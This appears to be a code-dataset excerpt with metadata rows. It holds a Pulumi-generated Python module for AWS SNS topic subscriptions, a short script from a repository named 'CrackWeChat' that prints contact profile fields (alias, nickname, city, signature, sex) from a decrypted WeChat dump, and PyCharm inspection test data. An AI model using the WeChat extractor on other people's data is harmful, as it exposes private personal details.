:param pulumi.Input[str] owner_id: AWS account ID of the subscription's owner.
:param pulumi.Input[bool] pending_confirmation: Whether the subscription has not been confirmed.
:param pulumi.Input[str] protocol: Protocol to use. Valid values are: `sqs`, `sms`, `lambda`, `firehose`, and `application`. Protocols `email`, `email-json`, `http` and `https` are also valid but partially supported. See details below.
:param pulumi.Input[bool] raw_message_delivery: Whether to enable raw message delivery (the original message is directly passed, not wrapped in JSON with the original message in the message property). Default is `false`.
:param pulumi.Input[str] redrive_policy: JSON String with the redrive policy that will be used in the subscription. Refer to the [SNS docs](https://docs.aws.amazon.com/sns/latest/dg/sns-dead-letter-queues.html#how-messages-moved-into-dead-letter-queue) for more details.
:param pulumi.Input[str] subscription_role_arn: ARN of the IAM role to publish to Kinesis Data Firehose delivery stream. Refer to [SNS docs](https://docs.aws.amazon.com/sns/latest/dg/sns-firehose-as-subscriber.html).
:param pulumi.Input[str] topic: ARN of the SNS topic to subscribe to.
"""
if arn is not None:
pulumi.set(__self__, "arn", arn)
if confirmation_timeout_in_minutes is not None:
pulumi.set(__self__, "confirmation_timeout_in_minutes", confirmation_timeout_in_minutes)
if confirmation_was_authenticated is not None:
pulumi.set(__self__, "confirmation_was_authenticated", confirmation_was_authenticated)
if delivery_policy is not None:
pulumi.set(__self__, "delivery_policy", delivery_policy)
if endpoint is not None:
pulumi.set(__self__, "endpoint", endpoint)
if endpoint_auto_confirms is not None:
pulumi.set(__self__, "endpoint_auto_confirms", endpoint_auto_confirms)
if filter_policy is not None:
pulumi.set(__self__, "filter_policy", filter_policy)
if owner_id is not None:
pulumi.set(__self__, "owner_id", owner_id)
if pending_confirmation is not None:
pulumi.set(__self__, "pending_confirmation", pending_confirmation)
if protocol is not None:
pulumi.set(__self__, "protocol", protocol)
if raw_message_delivery is not None:
pulumi.set(__self__, "raw_message_delivery", raw_message_delivery)
if redrive_policy is not None:
pulumi.set(__self__, "redrive_policy", redrive_policy)
if subscription_role_arn is not None:
pulumi.set(__self__, "subscription_role_arn", subscription_role_arn)
if topic is not None:
pulumi.set(__self__, "topic", topic)
@property
@pulumi.getter
def arn(self) -> Optional[pulumi.Input[str]]:
"""
ARN of the subscription.
"""
return pulumi.get(self, "arn")
# NOTE(review): the accessors below belong to the state class for
# sns.TopicSubscription (its `class` header is above this chunk).  Each
# @property reads the stored value via pulumi.get and each setter writes
# it via pulumi.set; the getter docstrings describe the underlying SNS
# subscription attribute.  This is provider-generated code — keep the
# pulumi.get/pulumi.set key names in sync with the camelCase getter names.
@arn.setter
def arn(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "arn", value)
@property
@pulumi.getter(name="confirmationTimeoutInMinutes")
def confirmation_timeout_in_minutes(self) -> Optional[pulumi.Input[int]]:
"""
Integer indicating number of minutes to wait in retrying mode for fetching subscription arn before marking it as failure. Only applicable for http and https protocols. Default is `1`.
"""
return pulumi.get(self, "confirmation_timeout_in_minutes")
@confirmation_timeout_in_minutes.setter
def confirmation_timeout_in_minutes(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "confirmation_timeout_in_minutes", value)
@property
@pulumi.getter(name="confirmationWasAuthenticated")
def confirmation_was_authenticated(self) -> Optional[pulumi.Input[bool]]:
"""
Whether the subscription confirmation request was authenticated.
"""
return pulumi.get(self, "confirmation_was_authenticated")
@confirmation_was_authenticated.setter
def confirmation_was_authenticated(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "confirmation_was_authenticated", value)
@property
@pulumi.getter(name="deliveryPolicy")
def delivery_policy(self) -> Optional[pulumi.Input[str]]:
"""
JSON String with the delivery policy (retries, backoff, etc.) that will be used in the subscription - this only applies to HTTP/S subscriptions. Refer to the [SNS docs](https://docs.aws.amazon.com/sns/latest/dg/DeliveryPolicies.html) for more details.
"""
return pulumi.get(self, "delivery_policy")
@delivery_policy.setter
def delivery_policy(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "delivery_policy", value)
@property
@pulumi.getter
def endpoint(self) -> Optional[pulumi.Input[str]]:
"""
Endpoint to send data to. The contents vary with the protocol. See details below.
"""
return pulumi.get(self, "endpoint")
@endpoint.setter
def endpoint(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "endpoint", value)
@property
@pulumi.getter(name="endpointAutoConfirms")
def endpoint_auto_confirms(self) -> Optional[pulumi.Input[bool]]:
"""
Whether the endpoint is capable of [auto confirming subscription](http://docs.aws.amazon.com/sns/latest/dg/SendMessageToHttp.html#SendMessageToHttp.prepare) (e.g., PagerDuty). Default is `false`.
"""
return pulumi.get(self, "endpoint_auto_confirms")
@endpoint_auto_confirms.setter
def endpoint_auto_confirms(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "endpoint_auto_confirms", value)
@property
@pulumi.getter(name="filterPolicy")
def filter_policy(self) -> Optional[pulumi.Input[str]]:
"""
JSON String with the filter policy that will be used in the subscription to filter messages seen by the target resource. Refer to the [SNS docs](https://docs.aws.amazon.com/sns/latest/dg/message-filtering.html) for more details.
"""
return pulumi.get(self, "filter_policy")
@filter_policy.setter
def filter_policy(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "filter_policy", value)
@property
@pulumi.getter(name="ownerId")
def owner_id(self) -> Optional[pulumi.Input[str]]:
"""
AWS account ID of the subscription's owner.
"""
return pulumi.get(self, "owner_id")
@owner_id.setter
def owner_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "owner_id", value)
@property
@pulumi.getter(name="pendingConfirmation")
def pending_confirmation(self) -> Optional[pulumi.Input[bool]]:
"""
Whether the subscription has not been confirmed.
"""
return pulumi.get(self, "pending_confirmation")
@pending_confirmation.setter
def pending_confirmation(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "pending_confirmation", value)
@property
@pulumi.getter
def protocol(self) -> Optional[pulumi.Input[str]]:
"""
Protocol to use. Valid values are: `sqs`, `sms`, `lambda`, `firehose`, and `application`. Protocols `email`, `email-json`, `http` and `https` are also valid but partially supported. See details below.
"""
return pulumi.get(self, "protocol")
@protocol.setter
def protocol(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "protocol", value)
@property
@pulumi.getter(name="rawMessageDelivery")
def raw_message_delivery(self) -> Optional[pulumi.Input[bool]]:
"""
Whether to enable raw message delivery (the original message is directly passed, not wrapped in JSON with the original message in the message property). Default is `false`.
"""
return pulumi.get(self, "raw_message_delivery")
@raw_message_delivery.setter
def raw_message_delivery(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "raw_message_delivery", value)
@property
@pulumi.getter(name="redrivePolicy")
def redrive_policy(self) -> Optional[pulumi.Input[str]]:
"""
JSON String with the redrive policy that will be used in the subscription. Refer to the [SNS docs](https://docs.aws.amazon.com/sns/latest/dg/sns-dead-letter-queues.html#how-messages-moved-into-dead-letter-queue) for more details.
"""
return pulumi.get(self, "redrive_policy")
@redrive_policy.setter
def redrive_policy(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "redrive_policy", value)
@property
@pulumi.getter(name="subscriptionRoleArn")
def subscription_role_arn(self) -> Optional[pulumi.Input[str]]:
"""
ARN of the IAM role to publish to Kinesis Data Firehose delivery stream. Refer to [SNS docs](https://docs.aws.amazon.com/sns/latest/dg/sns-firehose-as-subscriber.html).
"""
return pulumi.get(self, "subscription_role_arn")
@subscription_role_arn.setter
def subscription_role_arn(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "subscription_role_arn", value)
@property
@pulumi.getter
def topic(self) -> Optional[pulumi.Input[str]]:
"""
ARN of the SNS topic to subscribe to.
"""
return pulumi.get(self, "topic")
@topic.setter
def topic(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "topic", value)
class TopicSubscription(pulumi.CustomResource):
"""
Pulumi resource for an AWS SNS topic subscription
(``aws:sns/topicSubscription:TopicSubscription``).
Inputs are documented on the ``__init__`` overloads below; ``arn``,
``confirmation_was_authenticated``, ``owner_id`` and
``pending_confirmation`` are output-only attributes computed by the
provider (see ``_internal_init``, where they are initialized to None).
"""
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
confirmation_timeout_in_minutes: Optional[pulumi.Input[int]] = None,
delivery_policy: Optional[pulumi.Input[str]] = None,
endpoint: Optional[pulumi.Input[str]] = None,
endpoint_auto_confirms: Optional[pulumi.Input[bool]] = None,
filter_policy: Optional[pulumi.Input[str]] = None,
protocol: Optional[pulumi.Input[str]] = None,
raw_message_delivery: Optional[pulumi.Input[bool]] = None,
redrive_policy: Optional[pulumi.Input[str]] = None,
subscription_role_arn: Optional[pulumi.Input[str]] = None,
topic: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
Provides a resource for subscribing to SNS topics. Requires that an SNS topic exist for the subscription to attach to. This resource allows you to automatically place messages sent to SNS topics in SQS queues, send them as HTTP(S) POST requests to a given endpoint, send SMS messages, or notify devices / applications. The most likely use case for provider users will probably be SQS queues.
> **NOTE:** If the SNS topic and SQS queue are in different AWS regions, the `sns.TopicSubscription` must use an AWS provider that is in the same region as the SNS topic. If the `sns.TopicSubscription` uses a provider with a different region than the SNS topic, this provider will fail to create the subscription.
> **NOTE:** Setup of cross-account subscriptions from SNS topics to SQS queues requires the provider to have access to BOTH accounts.
> **NOTE:** If an SNS topic and SQS queue are in different AWS accounts but the same region, the `sns.TopicSubscription` must use the AWS provider for the account with the SQS queue. If `sns.TopicSubscription` uses a Provider with a different account than the SQS queue, this provider creates the subscription but does not keep state and tries to re-create the subscription at every `apply`.
> **NOTE:** If an SNS topic and SQS queue are in different AWS accounts and different AWS regions, the subscription needs to be initiated from the account with the SQS queue but in the region of the SNS topic.
> **NOTE:** You cannot unsubscribe to a subscription that is pending confirmation. If you use `email`, `email-json`, or `http`/`https` (without auto-confirmation enabled), until the subscription is confirmed (e.g., outside of this provider), AWS does not allow this provider to delete / unsubscribe the subscription. If you `destroy` an unconfirmed subscription, this provider will remove the subscription from its state but the subscription will still exist in AWS. However, if you delete an SNS topic, SNS [deletes all the subscriptions](https://docs.aws.amazon.com/sns/latest/dg/sns-delete-subscription-topic.html) associated with the topic. Also, you can import a subscription after confirmation and then have the capability to delete it.
## Import
SNS Topic Subscriptions can be imported using the `subscription arn`, e.g.
```sh
$ pulumi import aws:sns/topicSubscription:TopicSubscription user_updates_sqs_target arn:aws:sns:us-west-2:0123456789012:my-topic:8a21d249-4329-4871-acc6-7be709c6ea7f
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[int] confirmation_timeout_in_minutes: Integer indicating number of minutes to wait in retrying mode for fetching subscription arn before marking it as failure. Only applicable for http and https protocols. Default is `1`.
:param pulumi.Input[str] delivery_policy: JSON String with the delivery policy (retries, backoff, etc.) that will be used in the subscription - this only applies to HTTP/S subscriptions. Refer to the [SNS docs](https://docs.aws.amazon.com/sns/latest/dg/DeliveryPolicies.html) for more details.
:param pulumi.Input[str] endpoint: Endpoint to send data to. The contents vary with the protocol. See details below.
:param pulumi.Input[bool] endpoint_auto_confirms: Whether the endpoint is capable of [auto confirming subscription](http://docs.aws.amazon.com/sns/latest/dg/SendMessageToHttp.html#SendMessageToHttp.prepare) (e.g., PagerDuty). Default is `false`.
:param pulumi.Input[str] filter_policy: JSON String with the filter policy that will be used in the subscription to filter messages seen by the target resource. Refer to the [SNS docs](https://docs.aws.amazon.com/sns/latest/dg/message-filtering.html) for more details.
:param pulumi.Input[str] protocol: Protocol to use. Valid values are: `sqs`, `sms`, `lambda`, `firehose`, and `application`. Protocols `email`, `email-json`, `http` and `https` are also valid but partially supported. See details below.
:param pulumi.Input[bool] raw_message_delivery: Whether to enable raw message delivery (the original message is directly passed, not wrapped in JSON with the original message in the message property). Default is `false`.
:param pulumi.Input[str] redrive_policy: JSON String with the redrive policy that will be used in the subscription. Refer to the [SNS docs](https://docs.aws.amazon.com/sns/latest/dg/sns-dead-letter-queues.html#how-messages-moved-into-dead-letter-queue) for more details.
:param pulumi.Input[str] subscription_role_arn: ARN of the IAM role to publish to Kinesis Data Firehose delivery stream. Refer to [SNS docs](https://docs.aws.amazon.com/sns/latest/dg/sns-firehose-as-subscriber.html).
:param pulumi.Input[str] topic: ARN of the SNS topic to subscribe to.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: TopicSubscriptionArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Provides a resource for subscribing to SNS topics. Requires that an SNS topic exist for the subscription to attach to. This resource allows you to automatically place messages sent to SNS topics in SQS queues, send them as HTTP(S) POST requests to a given endpoint, send SMS messages, or notify devices / applications. The most likely use case for provider users will probably be SQS queues.
> **NOTE:** If the SNS topic and SQS queue are in different AWS regions, the `sns.TopicSubscription` must use an AWS provider that is in the same region as the SNS topic. If the `sns.TopicSubscription` uses a provider with a different region than the SNS topic, this provider will fail to create the subscription.
> **NOTE:** Setup of cross-account subscriptions from SNS topics to SQS queues requires the provider to have access to BOTH accounts.
> **NOTE:** If an SNS topic and SQS queue are in different AWS accounts but the same region, the `sns.TopicSubscription` must use the AWS provider for the account with the SQS queue. If `sns.TopicSubscription` uses a Provider with a different account than the SQS queue, this provider creates the subscription but does not keep state and tries to re-create the subscription at every `apply`.
> **NOTE:** If an SNS topic and SQS queue are in different AWS accounts and different AWS regions, the subscription needs to be initiated from the account with the SQS queue but in the region of the SNS topic.
> **NOTE:** You cannot unsubscribe to a subscription that is pending confirmation. If you use `email`, `email-json`, or `http`/`https` (without auto-confirmation enabled), until the subscription is confirmed (e.g., outside of this provider), AWS does not allow this provider to delete / unsubscribe the subscription. If you `destroy` an unconfirmed subscription, this provider will remove the subscription from its state but the subscription will still exist in AWS. However, if you delete an SNS topic, SNS [deletes all the subscriptions](https://docs.aws.amazon.com/sns/latest/dg/sns-delete-subscription-topic.html) associated with the topic. Also, you can import a subscription after confirmation and then have the capability to delete it.
## Import
SNS Topic Subscriptions can be imported using the `subscription arn`, e.g.
```sh
$ pulumi import aws:sns/topicSubscription:TopicSubscription user_updates_sqs_target arn:aws:sns:us-west-2:0123456789012:my-topic:8a21d249-4329-4871-acc6-7be709c6ea7f
```
:param str resource_name: The name of the resource.
:param TopicSubscriptionArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
# Runtime __init__: decides which overload the caller used and forwards
# everything to _internal_init.
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(TopicSubscriptionArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
confirmation_timeout_in_minutes: Optional[pulumi.Input[int]] = None,
delivery_policy: Optional[pulumi.Input[str]] = None,
endpoint: Optional[pulumi.Input[str]] = None,
endpoint_auto_confirms: Optional[pulumi.Input[bool]] = None,
filter_policy: Optional[pulumi.Input[str]] = None,
protocol: Optional[pulumi.Input[str]] = None,
raw_message_delivery: Optional[pulumi.Input[bool]] = None,
redrive_policy: Optional[pulumi.Input[str]] = None,
subscription_role_arn: Optional[pulumi.Input[str]] = None,
topic: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
Build the input property bag and register the resource with the engine.
Raises TypeError for invalid ``opts``, for ``__props__`` supplied
without ``opts.id``, or for missing required inputs.
"""
# Normalize and validate resource options before use.
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
# Only build the input property bag when creating a new resource;
# with opts.id set, an existing resource is being looked up instead.
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = TopicSubscriptionArgs.__new__(TopicSubscriptionArgs)
__props__.__dict__["confirmation_timeout_in_minutes"] = confirmation_timeout_in_minutes
__props__.__dict__["delivery_policy"] = delivery_policy
# endpoint, protocol and topic are required unless the resource is
# being rehydrated from an existing URN.
if endpoint is None and not opts.urn:
raise TypeError("Missing required property 'endpoint'")
__props__.__dict__["endpoint"] = endpoint
__props__.__dict__["endpoint_auto_confirms"] = endpoint_auto_confirms
__props__.__dict__["filter_policy"] = filter_policy
if protocol is None and not opts.urn:
raise TypeError("Missing required property 'protocol'")
__props__.__dict__["protocol"] = protocol
__props__.__dict__["raw_message_delivery"] = raw_message_delivery
__props__.__dict__["redrive_policy"] = redrive_policy
__props__.__dict__["subscription_role_arn"] = subscription_role_arn
if topic is None and not opts.urn:
raise TypeError("Missing required property 'topic'")
__props__.__dict__["topic"] = topic
# Output-only attributes start as None and are filled in by the provider.
__props__.__dict__["arn"] = None
__props__.__dict__["confirmation_was_authenticated"] = None
__props__.__dict__["owner_id"] = None
__props__.__dict__["pending_confirmation"] = None
super(TopicSubscription, __self__).__init__(
'aws:sns/topicSubscription:TopicSubscription',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
arn: Optional[pulumi.Input[str]] = None,
confirmation_timeout_in_minutes: Optional[pulumi.Input[int]] = None,
confirmation_was_authenticated: Optional[pulumi.Input[bool]] = None,
delivery_policy: Optional[pulumi.Input[str]] = None,
endpoint: Optional[pulumi.Input[str]] = None,
endpoint_auto_confirms: Optional[pulumi.Input[bool]] = None,
filter_policy: Optional[pulumi.Input[str]] = None,
owner_id: Optional[pulumi.Input[str]] = None,
pending_confirmation: Optional[pulumi.Input[bool]] = None,
protocol: Optional[pulumi.Input[str]] = None,
raw_message_delivery: Optional[pulumi.Input[bool]] = None,
redrive_policy: Optional[pulumi.Input[str]] = None,
subscription_role_arn: Optional[pulumi.Input[str]] = None,
topic: Optional[pulumi.Input[str]] = None) -> 'TopicSubscription':
"""
Get an existing TopicSubscription resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] arn: ARN of the subscription.
:param pulumi.Input[int] confirmation_timeout_in_minutes: Integer indicating number of minutes to wait in retrying mode for fetching subscription arn before marking it as failure. Only applicable for http and https protocols. Default is `1`.
:param pulumi.Input[bool] confirmation_was_authenticated: Whether the subscription confirmation request was authenticated.
:param pulumi.Input[str] delivery_policy: JSON String with the delivery policy (retries, backoff, etc.) that will be used in the subscription - this only applies to HTTP/S subscriptions. Refer to the [SNS docs](https://docs.aws.amazon.com/sns/latest/dg/DeliveryPolicies.html) for more details.
:param pulumi.Input[str] endpoint: Endpoint to send data to. The contents vary with the protocol. See details below.
:param pulumi.Input[bool] endpoint_auto_confirms: Whether the endpoint is capable of [auto confirming subscription](http://docs.aws.amazon.com/sns/latest/dg/SendMessageToHttp.html#SendMessageToHttp.prepare) (e.g., PagerDuty). Default is `false`.
:param pulumi.Input[str] filter_policy: JSON String with the filter policy that will be used in the subscription to filter messages seen by the target resource. Refer to the [SNS docs](https://docs.aws.amazon.com/sns/latest/dg/message-filtering.html) for more details.
:param pulumi.Input[str] owner_id: AWS account ID of the subscription's owner.
:param pulumi.Input[bool] pending_confirmation: Whether the subscription has not been confirmed.
:param pulumi.Input[str] protocol: Protocol to use. Valid values are: `sqs`, `sms`, `lambda`, `firehose`, and `application`. Protocols `email`, `email-json`, `http` and `https` are also valid but partially supported. See details below.
:param pulumi.Input[bool] raw_message_delivery: Whether to enable raw message delivery (the original message is directly passed, not wrapped in JSON with the original message in the message property). Default is `false`.
:param pulumi.Input[str] redrive_policy: JSON String with the redrive policy that will be used in the subscription. Refer to the [SNS docs](https://docs.aws.amazon.com/sns/latest/dg/sns-dead-letter-queues.html#how-messages-moved-into-dead-letter-queue) for more details.
:param pulumi.Input[str] subscription_role_arn: ARN of the IAM role to publish to Kinesis Data Firehose delivery stream. Refer to [SNS docs](https://docs.aws.amazon.com/sns/latest/dg/sns-firehose-as-subscriber.html).
:param pulumi.Input[str] topic: ARN of the SNS topic to subscribe to.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _TopicSubscriptionState.__new__(_TopicSubscriptionState)
__props__.__dict__["arn"] = arn
__props__.__dict__["confirmation_timeout_in_minutes"] = confirmation_timeout_in_minutes
__props__.__dict__["confirmation_was_authenticated"] = confirmation_was_authenticated
__props__.__dict__["delivery_policy"] = delivery_policy
__props__.__dict__["endpoint"] = endpoint
__props__.__dict__["endpoint_auto_confirms"] = endpoint_auto_confirms
__props__.__dict__["filter_policy"] = filter_policy
__props__.__dict__["owner_id"] = owner_id
__props__.__dict__["pending_confirmation"] = pending_confirmation
__props__.__dict__["protocol"] = protocol
__props__.__dict__["raw_message_delivery"] = raw_message_delivery
__props__.__dict__["redrive_policy"] = redrive_policy
__props__.__dict__["subscription_role_arn"] = subscription_role_arn
__props__.__dict__["topic"] = topic
return TopicSubscription(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter
def arn(self) -> pulumi.Output[str]:
"""
ARN of the subscription.
"""
return pulumi.get(self, "arn")
@property
@pulumi.getter(name="confirmationTimeoutInMinutes")
def confirmation_timeout_in_minutes(self) -> pulumi.Output[Optional[int]]:
"""
Integer indicating number of minutes to wait in retrying mode for fetching subscription arn before marking it as failure. Only applicable for http and https protocols. Default is `1`.
"""
return pulumi.get(self, "confirmation_timeout_in_minutes")
@property
@pulumi.getter(name="confirmationWasAuthenticated")
def confirmation_was_authenticated(self) -> pulumi.Output[bool]:
"""
Whether the subscription confirmation request was authenticated.
"""
return pulumi.get(self, "confirmation_was_authenticated")
@property
@pulumi.getter(name="deliveryPolicy")
def delivery_policy(self) -> pulumi.Output[Optional[str]]:
"""
JSON String with the delivery policy (retries, backoff, etc.) that will be used in the subscription - this only applies to HTTP/S subscriptions. Refer to the [SNS docs](https://docs.aws.amazon.com/sns/latest/dg/DeliveryPolicies.html) for more details.
"""
return pulumi.get(self, "delivery_policy")
@property
@pulumi.getter
def endpoint(self) -> pulumi.Output[str]:
"""
Endpoint to send data to. The contents vary with the protocol. See details below.
"""
return pulumi.get(self, "endpoint")
@property
@pulumi.getter(name="endpointAutoConfirms")
def endpoint_auto_confirms(self) -> pulumi.Output[Optional[bool]]:
"""
Whether the endpoint is capable of [auto confirming subscription](http://docs.aws.amazon.com/sns/latest/dg/SendMessageToHttp.html#SendMessageToHttp.prepare) (e.g., PagerDuty). Default is `false`.
"""
return pulumi.get(self, "endpoint_auto_confirms")
@property
@pulumi.getter(name="filterPolicy")
def filter_policy(self) -> pulumi.Output[Optional[str]]:
"""
JSON String with the filter policy that will be used in the subscription to filter messages seen by the target resource. Refer to the [SNS docs](https://docs.aws.amazon.com/sns/latest/dg/message-filtering.html) for more details.
"""
return pulumi.get(self, "filter_policy")
@property
@pulumi.getter(name="ownerId")
def owner_id(self) -> pulumi.Output[str]:
"""
AWS account ID of the subscription's owner.
"""
return pulumi.get(self, "owner_id")
@property
@pulumi.getter(name="pendingConfirmation")
def pending_confirmation(self) -> pulumi.Output[bool]:
"""
Whether the subscription has not been confirmed.
"""
return pulumi.get(self, "pending_confirmation")
@property
@pulumi.getter
def protocol(self) -> pulumi.Output[str]:
"""
Protocol to use. Valid values are: `sqs`, `sms`, `lambda`, `firehose`, and `application`. Protocols `email`, `email-json`, `http` and `https` are also valid but partially supported. See details below.
"""
return pulumi.get(self, "protocol")
@property
@pulumi.getter(name="rawMessageDelivery")
def raw_message_delivery(self) -> pulumi.Output[Optional[bool]]:
"""
Whether to enable raw message delivery (the original message is directly passed, not wrapped in JSON with the original message in the message property). Default is `false`.
"""
return pulumi.get(self, "raw_message_delivery")
@property
@pulumi.getter(name="redrivePolicy")
def redrive_policy(self) -> pulumi.Output[Optional[str]]:
"""
JSON String with the redrive policy that will be used in the subscription. Refer to the [SNS docs](https://docs.aws.amazon.com/sns/latest/dg/sns-dead-letter-queues.html#how-messages-moved-into-dead-letter-queue) for more details.
"""
return pulumi.get(self, "redrive_policy")
@property
@pulumi.getter(name="subscriptionRoleArn")
def subscription_role_arn(self) -> pulumi.Output[Optional[str]]:
"""
ARN of the IAM role to publish to Kinesis Data Firehose delivery stream. Refer to [SNS docs](https://docs.aws.amazon.com/sns/latest/dg/sns-firehose-as-subscriber.html).
"""
return pulumi.get(self, "subscription_role_arn")
@property
@pulumi.getter
def topic(self) -> pulumi.Output[str]:
"""
ARN of the SNS topic to subscribe to.
"""
return pulumi.get(self, "topic")
| 61.055402
| 750
| 0.696634
| 5,659
| 44,082
| 5.265595
| 0.057607
| 0.058326
| 0.049332
| 0.045775
| 0.928082
| 0.911336
| 0.899557
| 0.880294
| 0.875495
| 0.856299
| 0
| 0.002226
| 0.205004
| 44,082
| 721
| 751
| 61.140083
| 0.848053
| 0.475818
| 0
| 0.732057
| 1
| 0
| 0.121825
| 0.048842
| 0
| 0
| 0
| 0
| 0
| 1
| 0.165072
| false
| 0.002392
| 0.011962
| 0
| 0.277512
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
632e657c2c55ebf6b6629dd8c81784e30e2577a5
| 1,464
|
py
|
Python
|
regex/regex.py
|
yukar1z0e/CrackWeChat
|
65c181033b8c290693cc37a82d29448fd568ed8c
|
[
"Apache-2.0"
] | 10
|
2019-09-16T09:24:16.000Z
|
2021-07-22T07:20:13.000Z
|
regex/regex.py
|
yukar1z0e/CrackWeChat
|
65c181033b8c290693cc37a82d29448fd568ed8c
|
[
"Apache-2.0"
] | null | null | null |
regex/regex.py
|
yukar1z0e/CrackWeChat
|
65c181033b8c290693cc37a82d29448fd568ed8c
|
[
"Apache-2.0"
] | 15
|
2019-09-22T19:37:50.000Z
|
2022-01-18T06:08:21.000Z
|
# -*- coding: utf-8 -*-
"""Extract profile fields from a decrypted WeChat contact dump.

Each line of the input file contains key/value runs of the form
``;Key: value;NextKey: ...``.  The original script copy-pasted the same
scan loop once per field (and declared an invalid ``UTF-0`` coding);
this version is Python 3, factors the shared logic into a helper, and
iterates over a data-driven (start marker, end marker) list.  The
printed output (a separator line before each field section plus one
trailing separator, then one line per extracted value) is unchanged.
"""
import re

# Path of the dump file the original script scanned.
INPUT_PATH = "C:/Users/yakum/Desktop/test0.txt"

# (start marker, end marker) pairs delimiting each field of interest,
# in the same order the original script printed them.
FIELDS = [
    (";Alias: ", ";EncryptUsername"),
    (";PyInitial: ", ";Nickname"),
    (";Nickname: ", ";Province"),
    (";Province: ", ";City"),
    (";City: ", ";Signature"),
    (";Signature: ", ";Sex"),
    (";Sex: ", ";EN"),
]


def extract_field(text, start_marker, end_marker):
    """Return every substring of *text* found between the two markers.

    Uses the same lookbehind/lookahead technique as the original regexes,
    so the markers themselves are excluded from each result.  Markers are
    escaped, making the helper safe for values containing regex specials.
    """
    pattern = r"(?<=%s).*?(?=%s)" % (re.escape(start_marker), re.escape(end_marker))
    return [match.group() for match in re.finditer(pattern, text)]


def main(path=INPUT_PATH):
    """Scan *path* once per field and print all extracted values."""
    for start_marker, end_marker in FIELDS:
        print("-----------")
        # The file is re-opened per field, mirroring the original's
        # one-pass-per-field behaviour; `with` guarantees it is closed.
        with open(path, "rb") as handle:
            for line in handle:
                # str(line) matches against the textual representation of
                # the raw bytes, as the original script did.
                for value in extract_field(str(line), start_marker, end_marker):
                    print(value)
    print("-----------")


if __name__ == "__main__":
    # Guarded so importing this module no longer performs file I/O.
    main()
| 34.046512
| 70
| 0.55806
| 200
| 1,464
| 4.085
| 0.17
| 0.068543
| 0.102815
| 0.119951
| 0.837209
| 0.837209
| 0.837209
| 0.837209
| 0.837209
| 0.837209
| 0
| 0.029388
| 0.163251
| 1,464
| 42
| 71
| 34.857143
| 0.637551
| 0.014344
| 0
| 0.74359
| 0
| 0
| 0.370139
| 0.172222
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.076923
| null | null | 0.384615
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
2d64733b86cb737f0cd64d405e2294e80be5cb0a
| 913
|
py
|
Python
|
python/testData/inspections/PyTypeCheckerInspection/ComparisonOperators.py
|
jnthn/intellij-community
|
8fa7c8a3ace62400c838e0d5926a7be106aa8557
|
[
"Apache-2.0"
] | 2
|
2019-04-28T07:48:50.000Z
|
2020-12-11T14:18:08.000Z
|
python/testData/inspections/PyTypeCheckerInspection/ComparisonOperators.py
|
Cyril-lamirand/intellij-community
|
60ab6c61b82fc761dd68363eca7d9d69663cfa39
|
[
"Apache-2.0"
] | 173
|
2018-07-05T13:59:39.000Z
|
2018-08-09T01:12:03.000Z
|
python/testData/inspections/PyTypeCheckerInspection/ComparisonOperators.py
|
Cyril-lamirand/intellij-community
|
60ab6c61b82fc761dd68363eca7d9d69663cfa39
|
[
"Apache-2.0"
] | 2
|
2020-03-15T08:57:37.000Z
|
2020-04-07T04:48:14.000Z
|
def test():
def f(x):
"""
:type x: str
"""
pass
class C(object):
def __gt__(self, other):
return []
o = object()
c = C()
f(<warning descr="Expected type 'str', got 'bool' instead">1 < 2</warning>)
